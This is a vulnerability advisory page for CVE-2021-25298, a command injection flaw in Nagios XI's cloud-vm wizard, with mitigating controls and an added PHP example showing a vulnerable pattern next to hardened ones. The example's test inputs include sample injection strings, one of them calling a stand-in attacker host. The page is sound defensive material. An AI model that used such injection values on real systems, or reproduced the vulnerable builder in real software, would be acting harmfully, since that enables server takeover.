CVE-2021-25298
Published: 15 February 2021
Summary
CVE-2021-25298 is a high-severity OS Command Injection (CWE-78) vulnerability in Nagios XI. Its CVSS 3.1 base score is 8.8 (High).
Operationally, it ranks in the top 1.1% of CVEs by exploit likelihood, CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog, and a public proof-of-concept is referenced.
The strongest compensating controls our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and AC-6 (Least Privilege); the primary fix remains upgrading to a Nagios XI release later than 5.7.5, as the references describe no other remediation.
Deeper analysis
Nagios XI version xi-5.7.5 contains an OS command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. The flaw arises from insufficient sanitization of input supplied by an authenticated user in a single HTTP request, enabling execution of arbitrary operating system commands on the Nagios XI server. The issue is tracked as CVE-2021-25298 with a CVSS 3.1 score of 8.8 and is associated with CWE-78.
An authenticated attacker with network access to the Nagios XI web interface can exploit the weakness by submitting a single crafted HTTP request to the affected wizard component. Successful exploitation runs arbitrary commands on the underlying server, typically in the context of the web-server (PHP) process, with high impact to confidentiality, integrity, and availability and no user interaction required.
Public references include the Nagios versions.php page for software updates, along with exploit write-ups on PacketStorm and GitHub that demonstrate remote code execution against version 5.7.5. The references describe no mitigation beyond upgrading.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2021-12198
Vulnerability details
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
- CWE(s): CWE-78 (OS Command Injection)
- KEV Date Added: 18 January 2022
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly requires validation and sanitization of all user-supplied input before it is used in OS commands, which is exactly the missing check in cloud-vm.inc.php.
- AC-6 (Least Privilege): limits the privileges of the web-server process and the Nagios service account so that even a successful injection yields minimal OS-level impact (no sudo, no writable application code, no access to credentials beyond what monitoring needs).
- HTTP-layer filtering (for example a web application firewall): can be configured to inspect and block command-execution patterns or malicious payloads submitted via HTTP to the affected wizard. This is defence in depth only; it does not remove the flaw and can be bypassed by encoding, so it does not replace the upgrade.
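As an added illustration of the SI-10 control above, the following constructed PHP shows the CWE-78 pattern the CVE belongs to and its hardened form. It is not code from Nagios XI or from cloud-vm.inc.php (this page does not reproduce the vulnerable statement); the wizard handler, the $host parameter and the check_ping invocation are assumptions chosen for the example.

```php
<?php
// Added illustration for this page; NOT Nagios XI's own code. The wizard
// handler, the $host parameter and the check_ping invocation are assumptions
// used to show the CWE-78 pattern and its hardened form.

// Vulnerable pattern: authenticated input is interpolated directly into a
// shell command string. "10.0.0.5; id" ends the intended command and the
// shell runs the attacker's.
function build_check_vulnerable(string $host): string
{
    return "/usr/local/nagios/libexec/check_ping -H $host -w 100,20% -c 200,50%";
}

// SI-10, step 1: allowlist the value against the syntax the wizard actually
// needs (an IP literal or a DNS hostname) and reject anything else before it
// reaches a command builder.
function validate_host(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // RFC 1123 hostname: 1-63 char labels of letters, digits and hyphens,
    // no leading/trailing hyphen, dot-separated, at most 253 chars in total.
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return strlen($host) <= 253
        && preg_match("/^{$label}(\\.{$label})*$/", $host) === 1;
}

// SI-10, step 2 (for shell call sites you cannot yet remove): quote the
// validated value as one argument so the shell never parses it as syntax.
function build_check_hardened(string $host): string
{
    if (!validate_host($host)) {
        throw new InvalidArgumentException("rejected host value: $host");
    }
    return '/usr/local/nagios/libexec/check_ping -H ' . escapeshellarg($host)
        . ' -w 100,20% -c 200,50%';
}

// Preferred form: no shell at all. proc_open() accepts an argv array since
// PHP 7.4 and executes the program directly, so metacharacters are inert.
function build_check_argv(string $host): array
{
    if (!validate_host($host)) {
        throw new InvalidArgumentException("rejected host value: $host");
    }
    return ['/usr/local/nagios/libexec/check_ping', '-H', $host,
            '-w', '100,20%', '-c', '200,50%'];
}

// Self-check with constructed inputs:  php this_file.php
$cases = [
    '10.0.0.5'                  => true,
    'db-01.example.net'         => true,
    '10.0.0.5; id > /tmp/pwned' => false,
    '$(curl attacker.test)'     => false,
    '-bad.example'              => false,
];
foreach ($cases as $input => $expected) {
    $accepted = validate_host($input);
    printf("%-28s validate=%-5s %s\n", $input, var_export($accepted, true),
           $accepted === $expected ? 'ok' : 'MISMATCH');
}
echo "vulnerable: ", build_check_vulnerable('10.0.0.5; id > /tmp/pwned'), "\n";
echo "hardened:   ", build_check_hardened('10.0.0.5'), "\n";
```

Run it with `php this_file.php`. The allowlist is the primary control: escapeshellarg() handles multibyte input according to the process locale and has had edge cases there, so it is a second layer rather than a substitute for validation, and the argv form passed to proc_open() (PHP 7.4 or later) removes the shell from the path entirely. A quick audit of a PHP code base for the vulnerable pattern is to grep for shell_exec, exec, system, passthru, popen and backtick strings and check each argument for request-derived data.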